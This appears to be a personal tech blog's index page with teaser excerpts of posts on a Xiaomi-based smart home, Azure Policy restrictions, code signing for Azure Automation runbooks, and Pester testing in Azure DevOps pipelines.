My Journey to a Smarter Home (Part 2)

This is the 2nd part of the blog series. I have covered my home network setup using Ubiquiti Unifi devices in part 1, you can find it here. In this part, I will discuss the home automation solutions I have put in place using various products from Xiaomi and their Mi Home ecosystem partners. My cousin is a HUGE Xiaomi fan. Back in 2013, during my holiday in China, he showed me his Xiaomi phone and the Mi Box. I “felt in love” with Xiaomi products ever since. Xiaomi is a fairly young company, only founded in 2010. It has

Continue reading

My Journey to a Smarter Home (Part 1)

Over the last month, I have published 8 blog posts. Right now, although I still have few more on my to-do list, I’m just a bit over it. I want to write something different than my usual topics. I don’t know how many I am going to write right now, but I want to dedicate the next few posts to something that I have spent a lot of time on over the last couple of years – on all the gadgets I have installed at home, especially around home automation. I will share my experience on the following product families:

Continue reading

Azure Policy to Restrict Storage Account Firewall Rules

Back in the Jan 2018, I posted a custom Azure Policy definition that restricts the creation of public-facing storage account – in another word, if the storage account you are creating is not attached to a virtual network Service Endpoint, the policy engine will block the creation of this storage account. You can find the original post here: https://blog.tyang.org/2018/01/08/restricting-public-facing-azure-storage-accounts-using-azure-resource-policy/. When a storage account is connected to a Service Endpoint, you can also white-list one or more IP address ranges to allow them accessing the storage account from the outside of your Azure virtual network (i.e. the Internet). Therefore, in order

Continue reading

My Views on the Native Source Control Option in Azure Automation

Few weeks ago, I saw a two separate discussions in different closed community channels regarding to the Source Control option in Azure Automation accounts, more specifically – when will the support for VSTS become available. In the Azure Portal, it has been showing “coming soon”. According to Wikipedia, “Visual Studio Online” has been renamed to Visual Studio Team Services (VSTS) in November 2015: On 13 November 2013, Microsoft announced the release of a software as a service offering of Visual Studio on Microsoft Azure platform; at the time, Microsoft called it Visual Studio Online. Previously announced as Team Foundation Services,

Continue reading

Pester Test Your ARM Template in Azure DevOps CI Pipelines

Introduction It is fair to say, I have spent a lot of time on Pester lately. I just finished up a 12 months engagement with a financial institute here in Melbourne. During this engagement, everyone in the project team had to write tests for any patterns / pipelines they are developing. I once even wrote a standalone pipeline only to perform Pester tests. One of the scenario we had to cater for is: How can you ensure the ARM template you are deploying only deploys the resources that you intended to deploy? In another word, if someone has gone rogue

Continue reading

Deploying PowerShell Modules to NuGet Feeds (Version 2) Using VSTS CI/CD Pipelines

It’s been 2 weeks since my last post, I was half way through my list (of blogs to be written), then Melbourne was hit by a big cold wave, I got sick for over a week because of that, and with the recent outage of VSTS, I only got chance to finalise my code and demo for this post today. Background Last year, I posted an article on how to deploy PowerShell modules from GitHub to MyGet feeds using VSTS. I wasn’t really satisfied with what I did back then, and I had a requirement to develop several VSTS pipelines

Continue reading

Enforcing Code Signing for Azure Automation Runbooks on Hybrid Workers

Towards the end of last year, in order to solve a specific issue, we were planning to introduce Azure Automation Hybrid Workers to the customer I was working for back then. We planned to place the Hybrid Workers inside the on-prem network and execute several runbooks that required to run on-prem. The security team had some concerns – what if the Automation Accounts or Azure subscriptions get compromised? Then the bad guys can run malicious runbooks targeting on-prem machines. long story short, in the end, we managed to get the Hybrid Worker pattern approved and implemented because we can configure

Continue reading

PowerShell Module: PSPesterTest

Few weeks ago, the customer I was working for has a requirement that all the PowerShell scripts and in-house written modules must be validated against PSScriptAnalyzer as part of the build pipelines before it is implemented to their Azure environments in release pipelines. The validation must be performed using Pester so the test results can be easily consumed in the VSTS projects (i.e. dashboards). Luckily, I found this blog post: https://blog.kilasuit.org/2016/03/29/invoking-psscriptanalyzer-in-pester-tests-for-each-rule/, so I used this post as the starting point, and created a PowerShell module that performs pester test by invoking PS Script Analyzer rules. I named this module PSPesterTest.

Continue reading

Azure Policy–Restrict NICs From Connecting to Particular Subnets

I wrote this policy definition for a customer few weeks ago – to restrict VMs from connecting to particular subnets. The customer has several subnets that should not be used by VMs, i.e. dedicated subnet for Azure ADDS (which is not associated to any NSGs), or subnets that are using different NSGs, which normal users should not be using. Since the intension is not restricting users from using the entire VNet, but only particular subnets, we could not apply such restrictions using custom role definitions. Here’s the policy definition:

It is also located in my GitHub repo: https://github.com/tyconsulting/azurepolicy/tree/master/policy-definitions/restrict-vm-nic-from-connecting-to-subnet. From

Continue reading

Azure Policy Definition – Restricting Public IP for NIC

It has been a while since my last blog post. There were a lot going on outside of work, I couldn’t find time to write, and my blog to-do list is getting longer. Finally things are settled down a little bit. I will try to tackle my list in the coming days. To get started, I will target the easiest ones first. Few weeks ago, I had to write several custom Azure Policy definitions for a customer. One of them is to restrict Public IPs being provisioned for VMs in particular resource groups. I found a similar definition from the

Continue reading
%d bloggers like this: